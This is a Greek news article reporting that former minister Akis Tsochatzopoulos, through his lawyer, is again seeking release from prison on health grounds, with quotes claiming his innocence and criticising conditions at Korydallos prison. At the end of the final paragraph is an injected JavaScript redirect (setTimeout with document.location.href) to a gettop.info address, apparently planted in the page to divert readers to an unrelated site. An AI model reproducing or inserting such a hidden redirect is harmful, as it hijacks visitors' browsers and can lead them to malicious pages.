Νέα αίτηση αποφυλάκισης από τον Άκη Τσοχατζόπουλο: Έχω εγκεφαλική ατροφία

0
7

 

Για άλλη μια φορά ο συνήγορος του πρώην υπουργού Άκη Τσοχατζόπουλου, Γιάννης Παγορόπουλος κατέθεσε αίτηση αποφυλάκισής του επικαλούμενος λόγους υγείας ενώ παράλληλα ζήτησε από τους δικαστές επιείκεια.

Μάλιστα ο κ Παγορόπουλος ζήτησε την αποφυλάκιση του Άκη Τσοχατζόπουλου ακόμη και με βραχιολάκι προκειμένου να χαρεί το παιδί του όπως είπε που δεν πρόλαβε να το ζήσει εκτός φυλακής: «Δώστε του τη δυνατότητα να έχει χρόνο να ζήσει με τη γυναίκα του και το παιδί του το οποίο είναι 9,5 ετών και δεν έχει προλάβει να το ζήσει εκτός φυλακής».

«Η περίπτωση του πρώην υπουργού βρίσκεται σε μία χρονική στιγμή όπου ο χρόνος σε απόλυτο συνδυασμό με την ηλικία του έχει φέρει την αδήριτη ανάγκη να γίνει δεκτή η αίτηση αποφυλάκισης» σημείωσε υποστηρίζοντας πως ο πρώην υπουργός παρουσιάζει εγκεφαλική ατροφία ενώ επικαλέστηκε και τις επεμβάσεις στις οποίες έχει υποβληθεί ο Τσοχατζόπουλος στα μάτια του.

Ο ίδιος ο πρώην υπουργός τόνισε ότι είναι αθώος ενώ ισχυρίστηκε ότι κινδυνεύει η ασφάλειά του: «Είμαι παντελώς αθώος. Ζω υπό συνθήκες μειωμένης ασφάλειας! Είναι αποδεδειγμένες για σας αυτές οι κατηγορίες; Είμαι παντελώς αθώος, τίποτα δεν με αφορά από όλες τις κατηγορίες που έχουν ειπωθεί! Οι συνθήκες κράτησης στις φυλακές Κορυδαλλού είναι απαράδεκτες. Ο Κορυδαλλός έχει καταρρεύσει δεν υπάρχουν συνθήκες ασφαλούς διαμονής για συγκεκριμένους κρατούμενους,ενώ, αντίθετα υπάρχει ευνοϊκή, επιλεκτική μεταχείριση για άλλους».

«Σήμερα συνέβη ένα ακόμα επεισόδιο, πήγα στους γιατρούς να πάρω βεβαιώσεις και όταν γύρισα είχε φύγει κλούβα. Έρχονται στιγμές που δημιουργούνται επεισόδια, κακομεταχείριση όπως πριν λίγες εβδομάδες, μπαίνουν σε κίνδυνο άνθρωποι και ζωή τους» επεσήμανε.

Το δικαστήριο αναμένεται να απαντήσει στις 28 Σεπτεμβρίου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here